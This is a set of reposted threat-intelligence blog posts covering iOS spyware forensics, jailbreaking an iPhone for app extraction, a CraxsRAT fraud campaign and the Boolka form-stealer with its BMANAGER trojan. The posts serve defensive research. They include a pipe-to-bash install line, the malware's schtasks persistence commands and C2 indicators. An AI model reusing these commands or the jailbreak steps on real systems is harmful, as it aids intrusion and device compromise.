Apple failed to patch this flaw with a security feature called BlastDoorin iOS 14, instead implementing a Lockdown Mode mechanism that, for now, cybercriminals have not been able to bypass. Learn more about Lockdown Mode here.

While BlastDoor provides a flexible solution through sandbox analysis, Lockdown Mode imposes limitations on iMessage functionality. Nonetheless, the vulnerabilities associated with ImageIO may prompt users to consider disabling iMessage permanently. Another major problem is that there are no mechanisms to examine an infected iOS device directly. Researchers have three options:

Put the device in a safe and wait until an exploit is developed that can extract the full file system dump
Analyze the device’s network traffic (with certain limitations as not all viruses can transmit data via Wi-Fi)
Explore a backup copy of an iOS device, despite data extraction limitations

The backup copy must be taken only with encryption (password protection) as data sets in encrypted and unencrypted copies differ. Here, our analysts focus on the third approach, as it is a pragmatic way to safely examine potential infections without directly interacting with the compromised device. This approach allows researchers to analyze the device’s data in a controlled environment, avoiding any risk of further compromising the device and losing valuable evidence that forms the ground for crucial investigation and analysis.

To conduct research effectively, the users will need either a Mac or Linux device. Linux virtual machines can also be used, but it is recommended that users avoid using Windows Subsystem for Linux as it has issues with forwarding USB ports.

In the analysis performed by Group-IB experts, we use an open-source tool called Mobile Verification Toolkit (MVT), which is supported by a methodology report.

Let’s start with installing dependencies:

sudo apt install python3 python3-pip libusb-1.0-0 sqlite3

Next, install a set of tools for creating and working with iTunes backups:

sudo apt install libimobiledevice-utils

Lastly, install MVT:

git clone https://github.com/mvt-project/mvt.git
cd mvt
pip3 install

Now, let’s begin with the analysis. To create a backup, perform the following:

Connect the iOS device and verify the pairing process by entering your passcode.
Enter the following command:

ideviceinfo

Users will receive a substantial output with information about the connected device, such as the iOS version and model type:

ProductName: iPhone OS
ProductType: iPhone12.5
ProductVersion: 17.2.1

After that, users can set a password for the device backup:

idevicebackup2 -i encryption on

Enter the password for the backup copy and confirm it by entering your phone’s passcode.

As mentioned, the above step is crucial to ensure the integrity of the data extracted from the device.

Create the encrypted copy:

idevicebackup2 backup –full /path/to/backup/

This process may take a while depending on the amount of space available on your device. Users will also need to enter the passcode again.

Once the backup is complete (as indicated by the Backup Successful message), the users will need to decrypt it.

To do so, use MVT:

mvt-ios decrypt-backup -p [password] -d /path/to/decrypted /path/to/backup

After being through with the process, users may have successfully decrypted the backup.

Now, let’s check for known indicators. Download the most recent IoCs (Indicators of Compromise):

mvt-ios download-iocs

We can also track IoCs relating to other spyware attacks from several sources, such as:

“NSO Group Pegasus Indicators of Compromise”
“Predator Spyware Indicators of Compromise”
“RCS Lab Spyware Indicators of Compromise”
“Stalkerware Indicators of Compromise”
“Surveillance Campaign linked to mercenary spyware company”
“Quadream KingSpawn Indicators of Compromise”
“Operation Triangulation Indicators of Compromise”
“WyrmSpy and DragonEgg Indicators of Compromise”

The next step is to launch the scanning:

mvt-ios check-backup –output /path/to/output/ /path/to/decrypted/

The users will obtain the following set of JSON files for analysis.

If any infections are detected, the users will receive a *_detected.json file with detections.

Image 1: Result of MVT IOCs scan with four detections

Image 2: The detected results are saved in separate files with “_detected” ending

If there are suspicions of spyware or malware without IOCs, but there are no detections, and a full file system dump isn’t feasible, users will need to work with the resources at hand. The most valuable files in the backup include:

Safari_history.json – check for any suspicious redirects and websites.

“id”: 5,
“url”: “http://yahoo.fr/”,
“visit_id”: 7,
“timestamp”: 726652004.790012,
“isodate”: “2024-01-11 07:46:44.790012”,
“redirect_source”: null,
“redirect_destination”: 8,
“safari_history_db”: “1a/1a0e7afc19d307da602ccdcece51af33afe92c53”

Datausage.json – check for suspicious processes.

“first_isodate”: “2023-11-21 15:39:34.001225”,
“isodate”: “2023-12-14 03:05:02.321592”,
“proc_name”: “mDNSResponder/com.apple.datausage.maps”,
“bundle_id”: “com.apple.datausage.maps”,
“proc_id”: 69,
“wifi_in”: 0.0,
“wifi_out”: 0.0,
“wwan_in”: 3381.0,
“wwan_out”: 8224.0,
“live_id”: 130,
“live_proc_id”: 69,
“live_isodate”: “2023-12-14 02:45:10.343919”

Os_analytics_ad_daily.json – check for suspicious processes.

“package”: “storekitd”,
“ts”: “2023-07-11 05:24:31.981691”,
“wifi_in”: 400771.0,
“wifi_out”: 52607.0,
“wwan_in”: 0.0,
“wwan_out”: 0.0

Keeping a backup copy of a control device is required to maintain a record of the current names of legitimate processes within a specific iOS version. This control device can be completely reset and reconfigured with the same iOS version. Although annual releases often introduce significant changes, new legitimate processes may still be added, even within a year, through major system updates.

Sms.json – check for links, the content of these links, and domain information.

        "ROWID": 97,
        "guid": "9CCE3479-D446-65BF-6D00-00FC30F105F1",
        "text": "",
        "replace": 0,
        "service_center": null,
        "handle_id": 1,
        "subject": null,
        "country": null,
        "attributedBody": "",
        "version": 10,
        "type": 0,
        "service": "SMS",
        "account": "P:+66********",
        "account_guid": "54EB51F8-A905-42D5-832E-D98E86E4F919",
        "error": 0,
        "date": 718245997147878016,
        "date_read": 720004865472528896,
        "date_delivered": 0,
        "is_delivered": 1,
        "is_finished": 1,
        "is_emote": 0,
        "is_from_me": 0,
        "is_empty": 0,
        "is_delayed": 0,
        "is_auto_reply": 0,
        "is_prepared": 0,
        "is_read": 1,
        "is_system_message": 0,
        "is_sent": 0,
        "has_dd_results": 1,
        "is_service_message": 0,
        "is_forward": 0,
        "was_downgraded": 0,
        "is_archive": 0,
        "cache_has_attachments": 0,
        "cache_roomnames": null,
        "was_data_detected": 1,
        "was_deduplicated": 0,
        "is_audio_message": 0,
        "is_played": 0,
        "date_played": 0,
        "item_type": 0,
        "other_handle": 0,
        "group_title": null,
        "group_action_type": 0,
        "share_status": 0,
        "share_direction": 0,
        "is_expirable": 0,
        "expire_state": 0,
        "message_action_type": 0,
        "message_source": 0,
        "associated_message_guid": null,
        "associated_message_type": 0,
        "balloon_bundle_id": null,
        "payload_data": null,
        "expressive_send_style_id": null,
        "associated_message_range_location": 0,
        "associated_message_range_length": 0,
        "time_expressive_send_played": 0,
        "message_summary_info": null,
        "ck_sync_state": 0,
        "ck_record_id": null,
        "ck_record_change_tag": null,
        "destination_caller_id": "+66926477437",
        "is_corrupt": 0,
        "reply_to_guid": "814A603F-4FEC-7442-0CBF-970C14217E1B",
        "sort_id": 0,
        "is_spam": 0,
        "has_unseen_mention": 0,
        "thread_originator_guid": null,
        "thread_originator_part": null,
        "syndication_ranges": null,
        "synced_syndication_ranges": null,
        "was_delivered_quietly": 0,
        "did_notify_recipient": 0,
        "date_retracted": 0,
        "date_edited": 0,
        "was_detonated": 0,
        "part_count": 1,
        "is_stewie": 0,
        "is_kt_verified": 0,
        "is_sos": 0,
        "is_critical": 0,
        "bia_reference_id": null,
        "fallback_hash": "s:mailto:ais|(null)(4)<7AD4E8732BAF100ABBAF4FAE21CBC3AE05487253AC4F373B7D1470FDED6CFE91>",
        "phone_number": "AIS",
        "isodate": "2023-10-06 00:46:37.000000",
        "isodate_read": "2023-10-26 09:21:05.000000",
        "direction": "received",
        "links": [
            "https://m.ais.co.th/J1Hpm91ix"
        ]
    },

Sms_attachments.json – check for suspicious attachments.

        "attachment_id": 4,
        "ROWID": 4,
        "guid": "97883E8C-99FA-40ED-8E78-36DAC89B2939",
        "created_date": 726724286,
        "start_date": "",
        "filename": "~/Library/SMS/Attachments/b8/08/97883E8C-99FA-40ED-8E78-36DAC89B2939/IMG_0005.HEIC",
        "uti": "public.heic",
        "mime_type": "image/heic",
        "transfer_state": 5,
        "is_outgoing": 1,
        "user_info": ",
        "transfer_name": "IMG_0005.HEIC",
        "total_bytes": 1614577,
        "is_sticker": 0,
        "sticker_user_info": null,
        "attribution_info": null,
        "hide_attachment": 0,
        "ck_sync_state": 0,
        "ck_server_change_token_blob": null,
        "ck_record_id": null,
        "original_guid": "97883E8C-99FA-40ED-8E78-36DAC89B2939",
        "is_commsafety_sensitive": 0,
        "service": "iMessage",
        "phone_number": "*",
        "isodate": "2024-01-12 03:51:26.000000",
        "direction": "sent",
        "has_user_info": true
    }

Webkit_session_resource_log.json andwebkit_resource_load_statistics.json – check for suspicious domains.

{
        "domain_id": 22,
        "registrable_domain": "sitecdn.com",
        "last_seen": 1704959295.0,
        "had_user_interaction": false,
        "last_seen_isodate": "2024-01-11 07:48:15.000000",
        "domain": "AppDomain-com.apple.mobilesafari",
        "path": "Library/WebKit/WebsiteData/ResourceLoadStatistics/observations.db"
    }

Tcc.json – check which applications have been granted which permissions.

        "service": "kTCCServiceMotion",
        "client": "com.apple.Health",
        "client_type": "bundle_id",
        "auth_value": "allowed",
        "auth_reason_desc": "system_set",
        "last_modified": "2023-07-11 06:25:15.000000"

To collect data about processes, users can use XCode Instruments.

Note: Developer mode must be enabled on the iOS device.

Image 3: Showcasing XCode instruments profile selection

Process data collection:

Image 4: Process list from iPhone

Overcoming the iOS interception challenge

For the common public

iOS security architecture typically prevents normal apps from performing unauthorized surveillance. However, a jailbroken device can bypass these security measures. Pegasus and other mobile malware may exploit remote jailbreak exploits to steer clear of detection by security mechanisms. This enables operators to install new software, extract data, and monitor and collect information from targeted devices.

Warning signs of an infection on the device include:

Slower device performance
Spontaneous reboots or shutdowns
Rapid battery drain
Appearance of previously uninstalled applications
Unexpected redirects to unfamiliar websites

This reinstates the critical importance of maintaining up-to-date devices and prioritizing mobile security. Recommendations for end-users include:

Avoid clicking on suspicious links
Review app permissions regularly
Enable Lockdown mode for protection against spyware attacks
Consider disabling iMessage and FaceTime for added security
Always install the updated version of the iOS

For businesses: Protect against Pegasus and other APT mobile malware

Securing mobile devices, applications, and APIs is crucial, particularly when they handle financial transactions and store sensitive data. Organizations operating in critical sectors, government, and other industries are prime targets for cyberattacks such as espionage and more, especially high-level employees.

Researching iOS devices presents challenges due to the closed nature of the system. Group-IB Threat Intelligence, however, helps organizations worldwide identify cyber threats in different environments, including iOS, with our recent discovery being GoldPickaxe.iOS – the first iOS Trojan harvesting facial scans and using them to potentially gain unauthorized access to bank accounts. Group-IB Threat Intelligence provides a constant feed on new and previously conducted cyber attacks, the tactics, techniques, and behaviors of threat actors, and susceptibility of attacks based on your organization’s risk profile— giving a clear picture of how your devices can be exploited by vectors, to initiate timely and effective defense mechanisms.

If you suspect your iOS or Android device has been compromised by Pegasus or similar spyware, turn to our experts for immediate support. To perform device analysis or set up additional security measures, organizations can also get in touch with Group-IB’s Digital Forensics team for assistance.

GoldPickaxe exposed: How Group-IB analyzed the face-stealing iOS Trojan and how to do it yourself

Posted on October 2, 2024 - October 2, 2024 by Maq Verma

Introduction

In the recent Hi-Tech Crime Trends report, Group-IB experts highlighted a concerning shift in the focus of cybercriminals towards Apple devices. The shift is driven by the increasing popularity and adoption of Apple products in both consumer and corporate environments. As a result, the number of malicious programs targeting iOS and macOS devices has risen exponentially.

The App Store, once considered highly secure, is now at risk of frequent attempts to distribute malware. The increased use of iCloud and other Apple cloud services has made these platforms more appealing to cybercriminals. What’s more, Apple is now officially allowing third-party app stores to distribute iOS apps in Europe. The change is due to Apple being designated a “gatekeeper” under the EU’s Digital Markets Act (DMA). Threat actors are expected to capitalize on this development.

Cybercriminals have started modifying schemes traditionally aimed at Android to target iOS. Group-IB’s discovery of GoldPickaxe malware illustrates this trend. GoldPickaxe, the first iOS Trojan that harvests facial recognition data, is a modified version of the Android Trojan GoldDigger — but with new capabilities. In our detailed analysis, Group-IB experts dissected the new Trojan and found that cybercriminals had leveraged stolen data to impersonate real users and log into their bank accounts.

Hackers will likely continue to look for new ways of exploiting Apple devices, especially as smart technologies and IoT devices become used more widely. This increasing threat landscape shows how important it is to understand how to analyze iOS-related malware. In this article, we will guide you through the process of jailbreaking an iOS device for investigation purposes. By leveraging vulnerabilities such as Checkm8, cybersecurity experts can examine applications thoroughly and uncover potential threats. The goal of the guide is to equip readers with the tools and knowledge they need to investigate iOS devices, analyze any installed apps, and mitigate risks posed by iOS-related threats.

Dangers behind outdated Apple solutions: Checkm8 vulnerability

New security concerns around Apple devices keep coming to light. They are often announced by Apple itself in regular security bulletins. Such disclosures emphasize the importance of informing users about potential risks and how to address them properly. One notable and enduring threat is the checkm8 vulnerability, discovered in 2019. Checkm8 is a bootloader vulnerability that is “burned into the silicon,” which means that it is impossible to completely fix it with software updates. The flaw allows attackers to compromise a device almost irrespective of the iOS version it runs. Apple has made strides to mitigate its impact, for example with the A12 Bionic chip that protects newer devices (iPhone XS/XR and later), but older models remain at risk.

The checkm8 vulnerability is especially relevant today because it is being exploited by many various vendors, who use it to brute-force passcodes on iOS devices. Moreover, the interconnected nature of Apple’s ecosystem means that if one device associated with an Apple ID is compromised, all devices linked to that ID are also at risk. This underscores the importance of not only updating to newer, more secure devices but also of employing stringent security practices across all connected Apple products.

How to jailbreak iOS for investigation purposes

In our recent article, Group-IB experts discussed how to detect sophisticated spyware like Pegasus, which is often used by advanced threat actors and state-sponsored groups to execute zero-click exploits, affecting zero-day vulnerabilities, and gain full remote control of devices without the victims noticing. But what if you need to examine a full-fledged application?

When conducting an in-depth analysis of iOS devices and the apps installed on them, users need to be aware that iOS does not back up apps themselves but only the data they contain, and to a limited extent. It is not enough to rely on a backup copy alone.

To analyze an iPhone, users will require a device that can be jailbroken and forensics tools for jailbreaking iOS devices. The following tools are the most up-to-date:

Processor	A8-A11	A8-A16
Devices	iPhone 6S, 7, 8, X	iPhone 6S-14
Jailbreak	Palera1n	Dopamine
iOS versions	All	15.0.0-16.5.1

The most accessible option for cybersecurity experts is to acquire an iPhone X, which features a vulnerable bootrom (Checkm8 vulnerability) and runs a relatively recent iOS version (16), enabling the installation and normal functioning of all applications. While Checkm8 poses risks to users, mobile forensic experts can leverage the vulnerability to analyze malware.

To jailbreak your device, you’ll require MacOS and Palera1n, a tool primarily intended for research. However, if you need a low-level copy of a device—referred to as a full logic copy—using this vulnerability, it’s advisable to use agents that are more forensically sound. These agents make minimal changes and leave fewer traces on the device, which is crucial for forensic analysis, especially when extracting digital evidence stored on the phone. You can learn more about bootloader-level extractions here.

Let’s start with downloading the jailbreak utility.

Next, sign it:

codesign --force --deep --sign - palera1n-macos-universal

And allow its execution:

chmod 777 palera1n-macos-universal

Next, try to run the tool:

./palera1n-macos-universal

Figure 1. Request for permission to execute an application for jailbreaking

Allow execution:

Figure 2. Settings menu to give permission to run the application

NB: Whenever you bypass built-in security mechanisms in MacOS, it is essential to ensure that the binary file is safe and trustworthy. If there is any doubt, it is safer to perform such operations within a virtual machine.

Jailbreaking a device can be done in two ways: rootful or rootless. For our purposes, we’ll opt for the rootless approach, without delving into specific technicalities.

If you are using a device with an Apple A11 processor running the latest iOS 16, it is crucial that the device has never had a passcode set and that the Secure Enclave Processor (SEP) state has remained unchanged. Simply removing the passcode won’t suffice in this scenario. You will need to completely reset the device—erase all content and settings—and set it up again from scratch. For further information, you can refer to the link.

To begin the jailbreak process, connect your iPhone to your computer using a USB-A to Lightning cable. When prompted on your iPhone, select “Trust” to establish the connection between the device and the computer. Once the connection is established and trusted, you can proceed to start the jailbreak procedure.

./palera1n-macos-universal

During the installation process, your phone will enter recovery mode. Following this, adhere to the timer and instructions displayed in the terminal. When prompted, manually switch the device to DFU (Device Firmware Update) mode according to the provided guidance.

Figure 3. Example of a timer in a terminal showing how to hold and press the buttons

If the process freezes, which can sometimes happen, try reconnecting the Lightning cable a few times. This may help to resolve the issue and allow the jailbreak process to continue smoothly.

Voilà! After the tool has been downloaded, you will find yourself with a jailbroken phone equipped with an app manager—in this instance, Sileo.

Figure 4. App managers Sileo and Zebra

Once launched, Sileo will prompt you to set a password for the “su” command. We highly advise setting the standard password: “alpine“. This is recommended because “alpine” is the default password for most utilities and tweaks—around 99% of them. Opting for any other password would require you to re-enter it in numerous places throughout the system.

Next, install Frida, a dynamic code instrumentation toolkit. To do so, add the repository to Sileo.

Figure 5. Repository list

It’s time to install Frida.

Once Frida is installed, you will need a Linux-based computer or a virtual machine. For our analysis, Group-IB experts used a Parallels virtual machine running Ubuntu.

Connect your iPhone to the machine and click “Trust” on the device to establish the connection:

First, perform some basic installations (if you’re an advanced user, you already know how):

sudo apt update
sudo apt upgrade
sudo curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.7/install.sh | bash
Restart teminal
nvm install --lts
nvm use --lts
npm install -g bagbak

Use bagbak to decrypt the application and extract it from the iPhone.

Enumerate the available packages:

bagbak -l

Figure 6. Output of the command bagbak -l

Check the list for the app you would like to be decrypted, and extract it from the iPhone. In this example, we are looking for com.nnmakakl.ajfihwejk. Also, it is important to take note and remember the app name.

Figure 7. Results of the search for the app

Set port 44 for SSH using is a special feature of palera1n and extract the app.

export SSH_PORT=44
// 44 ssh port for Paler1in jailbreak
bagbak com.nnmakakl.ajfihwejk

Mission accomplished! The result is an iOS App Store package (IPA) file of the app that is now decrypted and ready for analysis.

To find out what was inside the file, read our article.

How to stay safe against iOS threats

Despite having been discovered many years ago, vulnerabilities such as Checkm8 remain a threat on account of their ability to become deep-seated in the device’s hardware. New exploitation methods continue to emerge, which makes older devices particularly vulnerable. If a device linked to an Apple ID is compromised, it jeopardizes all devices associated with it and all synchronized data. Group-IB experts recommend taking the following steps to protect your devices:

For the general public:

Avoid connecting your primary Apple ID to devices that are known to be vulnerable to the Checkm8 exploit.
Use separate Apple IDs for older, vulnerable devices to minimize risk and limit data exposure.
Ensure a passcode is configured on your devices so that they benefit from the additional security provided by recent iOS updates.
Upgrade to newer devices with the A12 Bionic chip (iPhone XS/XR and later), which are immune to the Checkm8 vulnerability.
Never click on suspicious links. Mobile malware is often spread through malicious links in emails, text messages, and social media posts.
Carefully review the requested permissions when installing a new application and be on extreme alert when an app requests the Accessibility Service.
Refrain from engaging in unknown Testflight campaigns and avoid installing unknown MDM profiles and certificates.

For businesses: Protect against evolving iOS threats

Organizations seeking to perform device analysis or implement additional security measures can contact Group-IB’s Digital Forensics team for further assistance.
Analyzing iOS devices is particularly challenging due to the closed nature of the operating system. However, Group-IB’s Threat Intelligence team, which discovered GoldPickaxe.iOS, has the expertise needed to analyze even the most sophisticated malware families in depth and identify vulnerabilities exploited by threat actors. Group-IB Threat Intelligence provides detailed insights into attacker behaviors, helping you to understand how your devices are targeted and to protect your infrastructure in a timely and effective way.
To detect malware and block anomalous sessions before users enter any personal information, Group-IB recommends implementing a user session monitoring system such as Group-IB Fraud Protection.
Train your employees in risks related to mobile malware. This includes teaching them how to spot fake websites and malicious apps and how to protect their passwords and personal information.

Beware CraxsRAT: Android Remote Access malware strikes in Malaysia

Posted on October 2, 2024 - October 2, 2024 by Maq Verma

Background

In May 2024, the Group-IB team received a request from a Malaysia-based financial organization to investigate a malware sample targeting its clients in the Asia-Pacific region.

Based on details from the customer and the analysis by the Group-IB Fraud Protection team, the malware scenario was reconstructed as follows:

The victim visited a phishing website impersonating a local legitimate food brand, which prompted the victim to download an app to make a purchase. Approximately 5 minutes after downloading the app, the victim’s credentials were stolen, and experienced an unauthorized withdrawal of funds from the victim’s bank within 20 minutes of installing the app on their mobile device.

Figure 1. Example of phishing website

Figure 2. Attack Flow Diagram

After analyzing the malware sample, Group-IB Threat Intelligence experts concluded that this malware sample was attributed to the CraxsRAT.

Malware Profile

CraxsRAT is a notorious malware family of Android Remote Administration Tools (RAT) that features remote device control and spyware capabilities, including keylogging, performing gestures, recording cameras, screens, and calls. For more in-depth technical information and insights into such malware can be found in our CraxsRAT malware blog. While this Android RAT family has the capability to send SMSes to the victim’s contacts that can be used for further distribution, Group-IB’s Fraud Protection team did not observe this in use during this campaign.

Figure 3. Trojan first screen

Scheme Target

In this campaign, CraxsRAT primarily targets banking organizations in Malaysia. Following a request from a customer, Group-IB began an investigation and found over 190 additional samples in Malaysia. They all share the same package name generation scheme and impersonated local legitimate brands within the retail services, infrastructure, food and beverages, delivery and logistics, and other consumer-oriented businesses. Brands are identified based on applications’ labels.

Impact

Victims that downloaded the apps containing CraxsRAT android malware will experience credentials leakage and their funds withdrawal illegitimately. Financial organizations targeted by CraxsRAT may experience potential damage to their brand reputation, in addition to increased compliance costs.

Modus Operandi

Figure 4. Fraud Matrix of this campaign

Detection and Prevention

Fraud Protection Events

To protect its clients from the threats posed by CraxsRAT android malware and similar threats, Group-IB Fraud Protection utilizes events/rules to detect and prevent CraxsRAT and other similar malware:

For Confirmed CraxsRAT Malware Samples

Group-IB Fraud Protection maintains a comprehensive database of all detected malware. When Fraud Protection system identifies applications from a mobile trojan list being downloaded onto an end user’s device, corresponding events would be triggered to promptly notify clients.

Figure 5. Example of “Mobile Banking Trojan”

For Ongoing Updated and New Strains – Signature-Based Detection

By analyzing the characteristics and fraudulent behavior matrix of CraxsRAT android malware, Group-IB Fraud Protection analysts develop new rules based on these shared attributes and defrauding techniques. These events target undetected or updated CraxsRAT malware samples and new strains exhibiting similar features, even without specific malware signatures.

For any other fake apps – Behaviour-Based Detection

Fake apps often require end users to grant Accessibility service access and enable remote access to their Android devices upon installation. Group-IB’s Fraud Protection Platform can detect Android zero-day malware, identify non-legitimate app downloads, and monitor Accessibility service, remote access status, and parallel or overlay activity on devices. These alerts are communicated to banks, enhancing the likelihood of preventing fraudulent transactions by threat actors.

Figure 6. Example of session on infected device

Mitigation from Other Perspectives

For End Users

End-users should install mobile applications from authorized app stores such as Google Play and the Apple Store to avoid downloading fake apps containing malware. Downloading apps from third-party sites significantly increases the risk of encountering fake app scam. Additionally, users should exercise caution when clicking suspicious buttons or links found on unknown websites or in emails to avoid unintentional granting high-privilege access to fraudsters and the potential loss of credentials.

For banking organizations

Banking organizations play a pivotal role in safeguarding their customers’ financial information. It is imperative for banks to educate customers about security best practices and promote proactive behavior. This includes advising customers to install mobile banking apps only from authorized app stores, avoid clicking on suspicious links, and regularly monitor their accounts for unusual activity. Additionally, banks should implement multi-factor authentication, real-time fraud detection systems, and provide timely alerts to customers regarding potential security threats. By fostering a culture of security awareness, banking organizations can significantly reduce the risk of fraudulent transactions and enhance overall trust in their services.

Conclusion

CraxsRAT malware allows fraudsters to remotely access a victim’s device and steal credentials, leading to financial loss. In addition, CraxsRAT malware is rapidly evolving, with a dramatically increasing number of new strains emerging each day. To build a multi-dimensional detection method for identifying sessions with confirmed malware samples or emerging new strains, the following events are recommended for clients of the Fraud Protection system:

Events – Signature-based detection: Fraud Protection can detect the mobile trojan and suspicious mobile application. These events facilitate the detection of confirmed malware samples, mobile trojans listed in the Fraud Protection trojan list, and any suspicious mobile applications.
Events – Behavior-based detection: Fraud Protection can detect Android zero-day malware, identify non-legitimate app downloads, and monitor Accessibility service, remote access status, and parallel or overlay activity on devices. These events enable the detection of emerging malware strains by analyzing their behaviors.
Events – Statistic-based detection: Fraud Protection can detect changes in user provider, high-risk ISPs, and IPs from high-risk countries. These events help identify suspicious IPs, subnets, and countries linked to known frauds or malwares, serving as informative notifications or as part of a combination of events to prevent fraudulent activity.
Events – Cross-department detection: In cooperation with Threat Intelligence, Fraud Protection can detect compromised user login. These events enable the tracking of activities of users whose accounts have been compromised, serving as user notifications or as part of a combination of events to prevent fraudulent activity.

Boolka Unveiled: From web attacks to modular malware

Posted on October 2, 2024 - October 2, 2024 by Maq Verma

Introduction

In January 2024, during the analysis of the infrastructure used by ShadowSyndicate Group-IB Threat Intelligence analysts detected a landing page designed to distribute the BMANAGER modular trojan, created by threat actor dubbed Boolka. Further analysis revealed that this landing page served as a test run for a malware delivery platform based on BeEF framework. The threat actor behind this campaign has been carrying out opportunistic SQL injection attacks against websites in various countries since at least 2022. Over the last three years, the threat actor have been infecting vulnerable websites with malicious JavaScript scripts capable of intercepting any data entered on an infected website.

This blogpost contains a description of:

injected JS snippets used by the attacker we named Boolka
a newly discovered trojan we dubbed BMANAGER

YARA rules are available for Group-IB Threat Intelligence customers.

If you have any information which can help to shed more light on this threat and enrich current research, please join our Cybercrime Fighters Club. We would appreciate any useful information to update the current blog post.

Description

Discovery via InfraStorm connection

In January 2024 Group-IB detected a new ShadowSyndicate server with IP address 45.182.189[.]109 by SSH fingerprint 1ca4cbac895fc3bd12417b77fc6ed31d. This server was used to host a website with domain name updatebrower[.]com. Further analysis showed that this website serves a modified version of Django admin page with injected script loaded from hXXps://beef[.]beonlineboo[.]com/hook.js.

The SSH key was mentioned in Group-IB blogpost. Based on that, an assumption was made that ShadowSyndicate is a RaaS affiliate that uses various types of ransomware, which is the most plausible case.

However, the information obtained during this research decreased the chance of this assumption being correct. We will continue to monitor InfraStorm assets to clarify the attribution. At the moment it looks like the aforementioned SSH belongs to some bulletproof hosting provider or VPN.

Web attacks

Threat actor Boolka started his activities in 2022 by infecting websites with malicious form stealing JavaScript script. The threat actor injected the following script tag into HTML code of websites (Picture 1).

Picture 1: Injected script tag

When a user visits the infected website, the script will be downloaded and executed. During execution it performs two main actions.

First, it sends a request to the threat actor’s server to notify it that the script was executed. It utilizes HTTP GET parameters with “document.location.hostname” returning the hostname of the infected website; and the current URL being Base64-encoded (Picture 2).

Picture 2: Sending a beacon to C2

Second, it collects and exfiltrates user input from infected website (Picture 3)

Picture 3: Data collection and exfiltration

The Boolka formstealing JavaScript script actively monitors user interactions, capturing and encoding input data from forms into session storage when form elements like inputs, selects, and buttons are changed or clicked. It sends all stored session data (collected form values) encoded in Base64 format back to the threat actor’s server. This behavior suggests that the script is designed for data exfiltration, potentially capturing sensitive user inputs such as passwords and usernames.

Since at least November 24th 2023, the payload loaded by the script tag was updated. Let’s compare two snippets used by Boolka before and after this update: https://urlscan.io/responses/420d8d83d5b98d959f7c62c2043b0cc2511385d4cab722b23ef4b39da5147bfc/, https://urlscan.io/responses/e6bc4f2ca5bf36fae278cbbc12bbacc12f475cd92f194a79c24afe384af3e6e7/. The updated version of this malicious script includes several modifications. Notably, it now checks for the presence of a specific div element with the ID “hookwork” on the page (Picture 4). If this div is not found, it creates one and sets it to be hidden.

Picture 4: Snippet for creating div element

The code now includes additional checks within the cbClickButton function to exclude certain sessionStorage properties (key, getItem, setItem, removeItem, clear) from being sent to the server (Picture 5).

Picture 5: Updated collection and exfiltration code

The event listeners for user interactions with input fields, buttons, and select elements remain, capturing user input and sending it to the remote server.

The IP addresses of servers hosting the Boolka infrastructure were reported for multiple SQL injection attempts. The number and locations of reporters allow us to speculate that these attacks were opportunistic since there was no particular pattern in regions attacked by threat actor. Based on this information we can infer that the infection of compromised websites was the result of exploitation of vulnerabilities detected during this opportunistic vulnerability scanning.

Example SQL Injection payload used by attacker:

Malware delivery

The landing page updatebrower[.]com (Picture 6) detected in January 2024 was a test run of a malware delivery platform created by Boolka. This platform was based on open source tool BeEF (The Browser Exploitation Framework). In addition to the use of the obvious subdomain “beef” and default BeEF filename “hook.js” VirusTotal also detected and saved default hook.js version.

Picture 6: Screenshot of first detected test landing page created by Boolka

In total threat actor created 3 domain names for landing pages but used only one of them:

updatebrower.com
1-update-soft.com
update-brower.com

In March 2024, Group-IB Threat Intelligence analysts detected the first use of Boolka’s malware delivery platform in the wild. While there are multiple overlaps between the list of websites infected with Boolka’s formstealing JS and Boolka’s BeEF payload, we can assume that during this campaign the threat actor used the same approach for website infection that he tested during early stages of his activities.

In analyzed cases BeEF-based malware delivery platform created by Boolka was used to distribute a downloader for the BMANAGER trojan.

Malware

Different malware samples were discovered during analysis. Infection starts with the BMANAGER dropper which will attempt to download the BMANAGER malware from a hard-coded URL.

The following malware samples have been discovered as being used by Boolka.

BMANAGER downloader
- Downloader
BMANAGER
- Downloader
BMREADER
- Data exfiltration
BMLOG
- Keylogger
BMHOOK
- Records which applications are running and have keyboard focus
BMBACKUP
- File stealer

All samples found thus far have been created with PyInstaller. The Python scripts used rely on Python 3.11.

BMANAGER downloader

The BMANAGER downloader attempts to download, configure persistence for, and execute the BMANAGER malware.

It downloads the BMANAGER from a URL hard-coded into the dropper using a HTTP(S) GET request.

The response to this request is a list of Base64 encoded strings. These strings are decoded, ZLIB decompressed, and appended to the BMANAGER executable file.

By default it drops the BMANAGER malware at: C:\Program Files\Full Browser Manager\1.0.0\bmanager.exe

BMANAGER persistence & execution

Persistence is achieved via Windows tasks. This starts the BMANAGER malware when the user logs into Windows.

schtasks /create /sc onlogon /tn bmanager  /tr "'C:\\Program Files\\Full 
Browser Manager\\1.0.0\\bmanager.exe'" /it /rl HIGHEST

The task is executed immediately after creation.

schtasks /run /tn bmanager

These values are hard-coded into the downloader.

BMANAGER

BMANAGER is capable of downloading files from a hard-coded C2, creating startup tasks, deleting startup tasks, and running executables.

Features

Download executables from a hard-coded C2 address
Create Windows tasks to allow executables to run on login
Create Windows tasks to run executables
Delete Windows tasks

Windows tasks & persistence

Persistence is achieved by creating Windows tasks. Individual malware samples do not have the capability to achieve persistence. This is done for them by the BMANAGER malware. The BMANAGER malware will execute the following command to achieve persistence:

schtasks /create /sc onlogon /tn {task_name}  /tr 
"'{path_to_executable}.exe'" /it /rl HIGHEST

With task_name being replaced by a name for the task as defined by the C2. And path_to_executable being replaced with the path to and name of the executable to configure the persistence for.

C2 communication

The malware communicates with the C2 via HTTP(S) GET requests.

Register client

On startup the malware will send messages to the C2 to register it using a GUID randomly generated by the malware. This GUID is stored in a local SQL database.

The initial C2 this request is sent to is hard-coded into the sample.

/client?guid={guid}
1. Expects a string “success” to be returned.
/getmainnodes?guid={guid}
1. Expects a list of potential C2s to be returned.
/
1. This request is sent to each C2 in the received list to determine response time.
2. List of C2s is sorted based on response time from low to high.
/client?guid={guid}
1. Request is executed for each C2 in the returned list.
2. Expects a string “success” to be returned.
3. If “success” is returned the C2 is selected as the active C2 and it stops going through the list of C2s.

The list of C2s is stored in a locally kept SQL database. The active C2 is marked as such in this SQL database.

Get target applications

Next the malware will attempt to retrieve a list of applications which are targets. This request is made to the active C2.

/getprogramms?guid={guid}

The response is a single string containing comma separated executable names.

